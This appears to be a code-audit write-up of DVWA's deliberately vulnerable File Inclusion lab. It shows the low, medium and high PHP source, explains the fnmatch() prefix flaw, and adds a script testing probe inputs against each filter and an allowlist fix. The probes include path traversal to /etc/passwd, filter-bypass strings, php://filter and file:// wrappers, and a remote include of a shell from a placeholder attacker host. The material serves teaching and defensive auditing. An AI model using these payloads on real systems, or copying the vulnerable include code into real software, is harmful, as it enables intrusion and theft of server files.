  • PHP code audit: File Inclusion (DVWA lab)

    low

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    
    <?php
    $file = $_GET['page'];
    if(isset($file)){
    	include($file);
    }
    ?>
    

    medium

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    <?php
    $file = $_GET['page'];
    $file = str_replace(array("https://","http://"), "", $file);
    $file = str_replace(array("../","./"), "", $file);
    echo $file;
    if(isset($file)){
    	include($file);
    }
    ?>
    

    high

    <!DOCTYPE html>
    <html>
    <head>
    	<title></title>
    </head>
    <body>
    <div class="vulnerable_code_area">
    		<em><a href="?page=file1.php">file1.php</a></em>
    		<em><a href="?page=file2.php">file2.php</a></em>
    		<em><a href="?page=file3.php">file3.php</a></em>
    </div>
    </body>
    </html>
    <?php
    $file = $_GET['page'];
    if(!(fnmatch("file*", $file)) && $file !="include.php"){
    	echo "ERROR file not found!";
    }else{
    	include($file);
    }
    ?>
    

    PHP notes

    fnmatch() matches a filename or string against a shell-style wildcard pattern (*, ?, [...]), the same syntax the shell uses for globbing. The pattern "file*" used in the high level therefore accepts any string that merely begins with "file", not only file1.php to file3.php; it is a prefix check, not an allowlist of the three intended pages.
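The script below is an added example, not code from the original post or from DVWA itself. It lifts the three filters from the listings above into pure functions, adds an allowlist version (an assumption of this example, the usual fix) and runs a set of constructed probe values through all four so the difference between "strip bad substrings once", "match a prefix" and "compare against a fixed list" is visible side by side. Host names and file names in the probes are placeholders.

```php
<?php
// Added example: not code from the original post or from DVWA itself.
// Each *Filter() function reproduces one level's filter from the listings
// above as a pure function that returns the string include() would get,
// or null when that level refuses the request.

// low: the request parameter goes straight into include().
function lowFilter(string $page): ?string
{
    return $page;
}

// medium: four substrings are stripped in single, non-recursive passes,
// so a value assembled around the removal can reform after the pass.
function mediumFilter(string $page): ?string
{
    $page = str_replace(array("https://", "http://"), "", $page);
    $page = str_replace(array("../", "./"), "", $page);
    return $page;
}

// high: fnmatch() uses shell wildcards, so "file*" accepts any string that
// merely begins with "file", including the file:// stream wrapper.
function highFilter(string $page): ?string
{
    if (!fnmatch("file*", $page) && $page != "include.php") {
        return null;
    }
    return $page;
}

// Hardened form (an assumption of this example, not DVWA code): only an
// exact member of an explicit allowlist is ever passed to include(), so
// wrappers, traversal and remote URLs are rejected without string surgery.
function allowlistFilter(string $page): ?string
{
    static $allowed = array("file1.php", "file2.php", "file3.php", "include.php");
    return in_array($page, $allowed, true) ? $page : null;
}

// Constructed probe values: the legitimate link target plus the inputs an
// auditor would try against each filter. Host names are placeholders.
$probes = array(
    "file1.php",
    "../../../../etc/passwd",       // plain traversal: every "../" is stripped
    "....//....//etc/passwd",       // doubled form: the "../" pass yields ../../, but this
                                    // variant also strips "./", which mangles it to ..etc/passwd
    "...././/...././/etc/passwd",   // reforms to ../../etc/passwd after both passes
    "http://attacker.example/shell.txt",
    "hthttp://tp://attacker.example/shell.txt", // "http://" removed once, leaving http:// behind
    "file:///etc/passwd",                        // begins with "file", so fnmatch("file*") accepts it
    "php://filter/convert.base64-encode/resource=file1.php",
);

$levels = array(
    "low"       => "lowFilter",
    "medium"    => "mediumFilter",
    "high"      => "highFilter",
    "allowlist" => "allowlistFilter",
);

foreach ($probes as $probe) {
    echo "page=" . $probe . "\n";
    foreach ($levels as $name => $fn) {
        $result = $fn($probe);
        printf("  %-9s %s\n", $name, $result === null ? "refused" : "include(\"" . $result . "\")");
    }
}
```

Run it with the PHP CLI and read the table per probe. Whether include() would actually fetch an http:// target depends on allow_url_include being enabled; php://filter does not need it, which is why the base64 wrapper is the usual first probe on low and medium. The allowlist column shows the fix: the user-controlled string is only ever compared, never transformed and then trusted.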
    
  • Original post: https://www.cnblogs.com/renhaoblog/p/14325596.html